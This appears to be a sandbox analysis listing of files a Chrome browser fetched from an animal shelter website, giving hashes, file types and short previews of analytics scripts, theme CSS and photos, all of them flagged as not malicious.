                                                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":12,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"",
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (722)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):723
                                                                                                                                                                                                                                                        Entropy (8bit):4.795938995749244
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:k2hVtdhDiwvRkfGexVoRkZEyqRWRe5RfRUlfnn:5bWeiVa6CWeP5Ul/
                                                                                                                                                                                                                                                        MD5:DB233B005C67EBC76456965158603606
                                                                                                                                                                                                                                                        SHA1:8EBFDFCF4AFB8178C86FADCF7EFA0B733A23476A
                                                                                                                                                                                                                                                        SHA-256:1C8F12BBE479E3FF41B1B4CDB2AB43EB599DE68F737C3A30685AB0A1C84639F4
                                                                                                                                                                                                                                                        SHA-512:1DB7A96067ED501535425D3C78F82F1570A2A655F10404482C893945410BEDC18EABC90ABA8CEEDAACDFE1213381B1033B6095649098DF86AC6995419A680C65
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-content/themes/thrive-theme/inc/assets/dist/landingpage-front.css?ver=10.4.2
                                                                                                                                                                                                                                                        Preview:body.tcb-full-top .landingpage-section,body.tcb-full-bottom .landingpage-section{width:100vw;left:50%;right:50%;margin-left:-50vw !important;margin-right:-50vw !important}.landingpage-section{flex-shrink:1;position:relative;margin:0;padding:0;box-sizing:border-box !important;display:flex;justify-content:center;align-items:center;width:100%;z-index:1}.landingpage-section .section-content{box-sizing:border-box !important;position:relative;z-index:1;margin-left:auto;margin-right:auto;height:100%;width:100%;max-width:100%}.landingpage-section .section-background{box-sizing:border-box;height:100%;position:absolute;top:0;overflow:hidden;width:100%;max-width:100%;z-index:0}.landingpage-section.hide-section{display:none}.
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):49
                                                                                                                                                                                                                                                        Entropy (8bit):3.176789192964165
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:CUVAae/XExlHrfx/n:8aOUJ/n
                                                                                                                                                                                                                                                        MD5:56398E76BE6355AD5999B262208A17C9
                                                                                                                                                                                                                                                        SHA1:A1FDEE122B95748D81CEE426D717C05B5174FE96
                                                                                                                                                                                                                                                        SHA-256:2F561B02A49376E3679ACD5975E3790ABDFF09ECBADFA1E1858C7BA26E3FFCEF
                                                                                                                                                                                                                                                        SHA-512:FD8B021F0236E487BFEE13BF8F0AE98760ABC492F7CA3023E292631979E135CB4CCB0C89B6234971B060AD72C0CA4474CBB5092C6C7A3255D81A54A36277B486
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:GIF89a...................!.......,...........T..;
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=14, orientation=upper-left, resolutionunit=2, manufacturer=Apple, model=iPhone 14 Plus, xresolution=203, yresolution=211, software=18.1.1, datetime=2024:12:20 12:45:19, hostcomputer=iPhone 14 Plus, xresolution=261, yresolution=269, GPS-Data], baseline, precision 8, 315x420, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):51759
                                                                                                                                                                                                                                                        Entropy (8bit):7.8887902907618574
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:i3XVdpS7CEiFkMjGMXV6oJEcEnskxFN5TSpq:i3FciFkoZV/JEXskxFNN7
                                                                                                                                                                                                                                                        MD5:DBD44CBB3563CAE97C636C2B324846FF
                                                                                                                                                                                                                                                        SHA1:447A64A087186D5FFD8C77D653D360E3724EE6D5
                                                                                                                                                                                                                                                        SHA-256:84E8649B856B7863C15D1DE6F274E33ACCFCA4A97129DDB90E7540199699FF8A
                                                                                                                                                                                                                                                        SHA-512:E679F895F89FDD60228AFEF4B207B6074982D1142D1DE7914F5574B1026835E7327F4162CA43870C5B9F44C8B61F103C1FA7F870070E16A0580148D93F597249
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...........<...................................i...........%.......f.......Apple.iPhone 14 Plus.H.......H.......18.1.1.2024:12:20 12:45:19.iPhone 14 Plus.H.......H......."."...........'.......@...........0232............................................395.........395.........0100....................................................................................................................................2...........3...........4...1...........................'.........../...........C...........W..........._...........g...........o...........w...............|...............-05:00.-05:00.-05:00..Q......}.-.....................Apple.iPhone 14 Plus back dual wide camera 5.7mm f/1.5.....<...........2024:12:20 12:45:19.2024:12:20 12:45:19......(..wl...\..k....E..........9............./.Apple iOS...MM.2.......................l.......h...l...............
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (5552)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):75143
                                                                                                                                                                                                                                                        Entropy (8bit):5.411023262177534
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:RJeUwT7hpwPCHM9ZVK01QYTZ02LKVsdmpyKcicI+0s:RIT7Vs9ZVKBYj8wKcHI+0s
                                                                                                                                                                                                                                                        MD5:72ABA4C9FEFC90EB8EC02D8B58FAD15B
                                                                                                                                                                                                                                                        SHA1:B7109116AC5E29A44DB4F8FE569D24293EA3FEE1
                                                                                                                                                                                                                                                        SHA-256:C831976892783ACEFA0FB4AE05B85910E1E0F3E50474F88DF3EA79CD0923C237
                                                                                                                                                                                                                                                        SHA-512:EEE5E7E8B9E7541C760BBB1D873E8F3C1004B115C140F6F2B02F22C3AF354CE67A21057AE8AFC977C6CD44AD142788B61239F89E82578C54AC6C565F1F03A80C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://connect.facebook.net/signals/config/1401480206566122?v=2.9.179&r=stable&domain=indyhumane.org&hme=b8122d5d96cd6f542162ba4f497489972d1ebe228d24c39d34f560e30ae932ce&ex_m=70%2C122%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C173%2C176%2C188%2C184%2C185%2C187%2C29%2C101%2C53%2C77%2C186%2C168%2C171%2C181%2C182%2C189%2C132%2C41%2C191%2C192%2C34%2C144%2C15%2C50%2C197%2C196%2C134%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C169%2C172%2C141%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113
                                                                                                                                                                                                                                                        Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (17995)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):18512
                                                                                                                                                                                                                                                        Entropy (8bit):5.035329146278265
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:pzfNhXFbxb7z6umaWqC1b85DqGD1IqRcKqYD:pz1xfz6uRlwb85DqGDug
                                                                                                                                                                                                                                                        MD5:69A25BBC4A42C35D6313A6D75AE4EFB0
                                                                                                                                                                                                                                                        SHA1:99D387664369B187CC7512040F4726C7C5477AD9
                                                                                                                                                                                                                                                        SHA-256:20A3CC4AA84F5980A4856AB4A59573AD3F19BB077E9F533DFAB994F155E93F9F
                                                                                                                                                                                                                                                        SHA-512:27EC9F68698C2C6A0C2DAB6F5F08A4152E49E872D7D6899EA5B6FFD6EF5A3CB988AAF9C7A67D79E4D0136F7E641536E376EF27044D9E8E34606B26D4422B67C8
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-content/themes/thrive-theme/style.css?ver=6.7.1
                                                                                                                                                                                                                                                        Preview:/*.Theme Name: Thrive Theme Builder.Theme URI: https://thrivethemes.com/.Author: <a href="https://thrivethemes.com">Thrive Themes</a>.Description: Thrive Theme Builder lets you visually design, build, edit and customize every aspect of your WordPress website with a visual drag-and-drop designer. .Version: 10.4.2 .License: GNU General Public License v2 or later.Text Domain: thrive-theme.Tags: custom-background, custom-logo, custom-menu, featured-images, threaded-comments, translation-ready, custom-everything.*/.html{box-sizing:border-box;font-size:16px;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;font-smooth:antialiased;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:auto}body{font-family:Arial,sans-serif;color:rgba(10,10,10,.85);font-size:1rem;line-height:1.5}body:not(.defaults){background:#fff;margin:0;padding:0}*,*:before,*:after{box-sizing:inherit}p,li,blockquote,q,pre,code,kbd,samp{color:rgba(10,10,10,.85);font-family:Arial,sans-serif;font-size:1rem;line-heigh
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 900 x 629, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):562791
                                                                                                                                                                                                                                                        Entropy (8bit):7.993861371657771
                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                        SSDEEP:12288:NlbpZbgshq2MbyY2n+AW31EY8FCvV+SUcDpmGByUJuTdALyP:jbpZbg+MbTHAW31EY8FCt+hGBy7eWP
                                                                                                                                                                                                                                                        MD5:19C0F31870AB2EE79EA8E3381B7FD7EB
                                                                                                                                                                                                                                                        SHA1:BFFE16A30F62A24E950889FCD2EBD25CD38EB753
                                                                                                                                                                                                                                                        SHA-256:65D30ED7C67067C1174F8FB7A774F55848E363DFE8F9A6F5CB5AFA2CD57B84F4
                                                                                                                                                                                                                                                        SHA-512:F0C3D4EA4C264C6188283EEBC767C1FA7A7C2CB21721A68AFC5BBD765558CB38614CCDB544E5FCD026FFF3F3679E7E939E9ED923F335EE5AECB4F5E653AD1310
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-content/uploads/2023/06/donate.png
                                                                                                                                                                                                                                                        Preview:.PNG........IHDR.......u.......>3....gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (5960)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):278500
                                                                                                                                                                                                                                                        Entropy (8bit):5.583666351579959
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6144:E+Cy+3IsyyHuDSVNF2KonhsGM5/GDhNcvnzHV+:rgItauDQpGDfiTo
                                                                                                                                                                                                                                                        MD5:7CC6756906B851D25E5F87E2E835E47A
                                                                                                                                                                                                                                                        SHA1:B01A607A2468BC2BBBA4CA21FDFD5E324B2DDC76
                                                                                                                                                                                                                                                        SHA-256:DF714E1C8F9549C6B553A86CB0D5F73C53C9AF8CB9121F959358D5A825B2E211
                                                                                                                                                                                                                                                        SHA-512:20B4E5484770BD72B265CE403C6A1257660A9B3BDF6D64105557885E1491F850A5C811B15992577237A571E0A15C0307DC3D2C7C1362BAB9B2B2E9DC424DD634
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://www.googletagmanager.com/gtag/js?id=G-VFFY2PDZ27&l=dataLayer&cx=c&gtm=45He5170v898710595za200
                                                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":7,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"","
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3829), with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):3829
                                                                                                                                                                                                                                                        Entropy (8bit):5.148341057398745
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:kiVcqIyGggolrX2UQe0DzGbExQgpxJwOeOBuHgwLHACBhASVUF/IF/NUF/fF/fFD:Q+2wytZCvLzn9OYBMtEux
                                                                                                                                                                                                                                                        MD5:B7E42972220B534E2E32B38C3876572D
                                                                                                                                                                                                                                                        SHA1:76B4384936878AE8656F3DF843BEB7A3D88FD86B
                                                                                                                                                                                                                                                        SHA-256:DF2698E6CF74ED890AFA92DA10051F880DF2CE0B3257B73C5D9AE2F6BEA82D3C
                                                                                                                                                                                                                                                        SHA-512:FDE037E2E1B4FAF726016C70A89E07F268E46A457A5636813AA8D032CFF4528690BB9CF24A7A4EAE37134F65F632987BB5C94998DFFC0D06BDE181A8968B9B0F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://secure.gaug.es/track.js
                                                                                                                                                                                                                                                        Preview:var _gauges=_gauges||[];(function(){var h=(_gauges['slice'])?_gauges.slice(0):[];_gauges={track_referrer:true,image:new Image(),track:function(){this.setCookie('_gauges_cookie',1,1);var a=this.url();if(a){this.image.src=a;var b=60*60,f=b*24,c=f*31,d=f*365,j=d*10;if(!this.getCookie('_gauges_unique_hour')){this.setCookie('_gauges_unique_hour',1,b)}if(!this.getCookie('_gauges_unique_day')){this.setCookie('_gauges_unique_day',1,f)}if(!this.getCookie('_gauges_unique_month')){this.setCookie('_gauges_unique_month',1,c)}if(!this.getCookie('_gauges_unique_year')){this.setCookie('_gauges_unique_year',1,d)}this.setCookie('_gauges_unique',1,d)}},push:function(a){var b=a.shift();if(b=='track'){_gauges.track()}},url:function(){var a,b,f,c=this.$('gauges-tracker');if(c){b=c.getAttribute('data-site-id');f=c.getAttribute('data-track-path');if(!f){f=c.src.replace('/track.js','/track.gif')}a=String(f);a+="?h[site_id]="+b;a+="&h[resource]="+this.resource();a+="&h[referrer]="+this.referrer();a+="&h[title]=
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 420x420, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):47327
                                                                                                                                                                                                                                                        Entropy (8bit):7.971891393176044
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:9ho5MkFCPUHtQ3Dgu3RDEG/L3f+5fMMD+FYoIlCgIZnNEyJEuaU1EfQVVN6axge5:9ho5MkHQ3r3RDEG/7f+5fsnNcuaPQfWI
                                                                                                                                                                                                                                                        MD5:FFF2060DA63D20667027166D27F103BF
                                                                                                                                                                                                                                                        SHA1:DFDAF7CCF51F8EFBDEC1EC3A3C1A3024EED1B382
                                                                                                                                                                                                                                                        SHA-256:B099DB8A09249895D67AC5BCFC2D8D4809A3A48C9AFE00C2E083E6239373C84C
                                                                                                                                                                                                                                                        SHA-512:645DA9790762EA7D522922A3BF754EAE58B6298117CD0C93E52B3AB2939C770C995A43B8622EC3B29C5499CB1715AE6DA156244EF962C635067185B62D883EA2
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....,.,..................................................................................................................................................."........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....sxvM_..$.R.uu....2H.Q^#.cx....&.p..'.....U./....-.G.w.".v....K.:)T...4....>&....5.....8.<.X.#..=.`../e..~.....,....0C...O2...,.....t?.^..f.....+..d.{....bI?1..=.k...V.....|Sc!.M..u....B..t.5.>.o.m."..c4.wp["tQ....h.W..........d~T.v.L..\n..\..[...Nb.t.=5.. ..J..._.wI_.q.]...........7.5rw}.Z.P.....?..'.g....sT...iH..iR..y?.}/R...m>7...^v....y7....,Ip..U."xG.'....}G.
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=13, orientation=upper-left, resolutionunit=2, manufacturer=Google, model=Pixel 8a, xresolution=186, yresolution=194, software=HDR+ 1.0.695519190zd, datetime=2024:12:11 13:28:09, xresolution=243, yresolution=251, GPS-Data], baseline, precision 8, 420x559, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):73162
                                                                                                                                                                                                                                                        Entropy (8bit):7.954265452011154
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:h3yQwLz1eK4NmhEQ6/cpBSRsoeCwmHIxgfyvQ8A/Zc6FXfynq3WPr:h39K4kGQ6UTi9wmoxgsQ9C6IW+r
                                                                                                                                                                                                                                                        MD5:1D7512CD33466BEC9592707210E4F368
                                                                                                                                                                                                                                                        SHA1:5CC996E91E6B0B5C458E0767A4201080BE2FE6E8
                                                                                                                                                                                                                                                        SHA-256:26B65B268350CC42A831412CB133737E46B59937D91ACF4DFA56431C10F91300
                                                                                                                                                                                                                                                        SHA-512:4CA77F2739A536D5B3116C6519C707EF9356D3B433BFDC3A0CB080BEB5F9F1C8D55354989DB27A8E83A7F2AFFF3243E34D2916D16EF06A65A142379A3B22EA39
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...................................i...........%...............Google.Pixel 8a.H.......H.......HDR+ 1.0.695519190zd.2024:12:11 13:28:09.H.......H.......(."...........'...................0232............................................891.........891.........891.........0100................................................................................................................................................................................................3...........4...#...............(...........0...........8...........L...........`...........h...........p...........x.......................................................-05:00.-05:00.-05:00.Google.Pixel 8a back camera 5.43mm f/1.89.. ..@B......d...2024:12:11 13:28:09.2024:12:11 13:28:09.....d.......d.......d...............d...........6.....................................N...........W.......
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 768 x 723, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):613496
                                                                                                                                                                                                                                                        Entropy (8bit):7.976334765963792
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12288:1pvuT5bwClQKx0HGaYyo+t08c/Zce+GB5pjQ9iuWUm0cY9LmHTrL:1pvuQGaYyNFycG5pQIulm0RLOfL
                                                                                                                                                                                                                                                        MD5:56E2A6302D9193845948DC3508E2EF7B
                                                                                                                                                                                                                                                        SHA1:48EC5B5F691C03B6CFFDDC2E52C5131FF7914C73
                                                                                                                                                                                                                                                        SHA-256:2D433174B869CC1D89571402AF702D7322FC9DF1847FCB48DA59A705A5F6C892
                                                                                                                                                                                                                                                        SHA-512:B81FF0BB66006960E53E855CBD53F4241A9AA493C21546E22F49E4EC2A6852D58D77A7FD99EA01C1F833FD97A96E5293D0FD19B50F04BC7B246CB1DF8B79493B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:.PNG........IHDR..............\e.....pHYs..........+.... .IDATx...k...}...s...m_..9g........j.$4miB)*-H...*Q@....o..!..Q..".W.RA.V..QT.*....&...I._..3g.e.u..+/..x&NR;...<....k.....~~..{~?.,.,.,.,.,.,.,.,.,.,.,.,.,.,.."...dY.e.=)%....6 .......t.o./~.........#.,...W.,.w.....B....'.t].p.m..p|...o....>.K.6P.nW.5._.n...[.7....c/......,{O..@.e.3.4...>..rz......5`.( H)....o...L...5O)U.K.........{........9......M.K.o...b...+..=#..Y.e...i..)..c.L.t:n1.....1..O......>=.'....N....y.......S.>.......$o.&.N.}Z,S@p....7....)^O.e.3+..Y.e......~.i.~...g.....G.4..Re..}g.v..)..Li7G.W............CdJ.yt]s....%..2.?...|I.1<.K.,{v.. ....R.....?b.\...g<..tx.....t-......"......8.....eY.......Y..=..y....y......e!.}...eY.... ..)9....._...w.L.......7..[...|=Y.eOT...,..........i..,....V....&.W..,{...@.e..v.....o2m..3.O.....) ...*.e.{Y...,..S-.O....,.|]..e*%.W....S.5...,..eY.T...WL%*...{.........>.[........i...~..QV.l.....o.iAY...<...Y..o.
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=2, orientation=upper-left], baseline, precision 8, 420x540, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):40189
                                                                                                                                                                                                                                                        Entropy (8bit):7.974509916133365
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:/bOFOjROl0esEXlAvgxAv5rwfRKaCMRNk9u7ifvFz44xwZREFUlz6:/PUPvWvgxi5rdaJRNk8iXO4ORaA6
                                                                                                                                                                                                                                                        MD5:AD22FAB4EBB3563618B31710D8FDE614
                                                                                                                                                                                                                                                        SHA1:26029816C9E04D0E27691DA117D2C970AED64B4C
                                                                                                                                                                                                                                                        SHA-256:07D6C613A054363F3C03EBCA421E9595CF17045FBD609B545BE4E6C2F38B3FE2
                                                                                                                                                                                                                                                        SHA-512:1D40C9D7D1F5383E2CBD26BC02CB2D861A8F39F3E877BF07AF6E309ABF0FC40783115BD3FD88793FB1FD69AACB7A64EDD93D767D6EEF978085FFFAE635124280
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/42822d30-5fc7-4b46-8640-effba9e4ddde.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....XExif..II*...................i.......&.................................................................................................................................................................................................."........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....Q..i..oZ.$.....V&5.l....$..W.....Z.T...pq.X..^.R..y.D...mYR...b...6.>...k.t.VH..V<...k~-...S,...Z.].;....QK..V.n..Q^I..]7p&_9..zu..Q...}Kl.ZF...PH.c?=i7....&..y.@.VOSOYFz.....S@.I/59.#.Y.)......i...q...R3Q..Y..F.........n9*./.+62zf....+..(..G8.PV.Z..(`..N:....Z...o..8.MX..<6...S...j..&
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (15752)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):18726
                                                                                                                                                                                                                                                        Entropy (8bit):4.756109283632968
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:WTbvzWuPTb9Uh3o//bEPjXgA2k1efAJmpr:WX6U9Uh3o//YrXgAGfACr
                                                                                                                                                                                                                                                        MD5:B976B651932BFD25B9DDB5B7693D88A7
                                                                                                                                                                                                                                                        SHA1:7FCB7CB5C11227F9213B1E08A07D0212209E1432
                                                                                                                                                                                                                                                        SHA-256:4E6CE5444C7F396CEF0EB1FA3611034151E485DD06FBE5573A5583E1EEBC98C3
                                                                                                                                                                                                                                                        SHA-512:A241EBDCFAF153D5C2A86761145B2575CBE734B4F416ACBFAC082AE5C6EB7C706BD6CA3BC286B7E1A0F9E326729252DCB95B776750C4A3A0D81F2AA6258EA39F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
